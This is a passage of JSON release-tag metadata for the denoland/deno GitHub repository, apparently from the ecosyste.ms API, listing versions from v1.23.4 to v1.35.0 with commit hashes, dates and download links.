published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v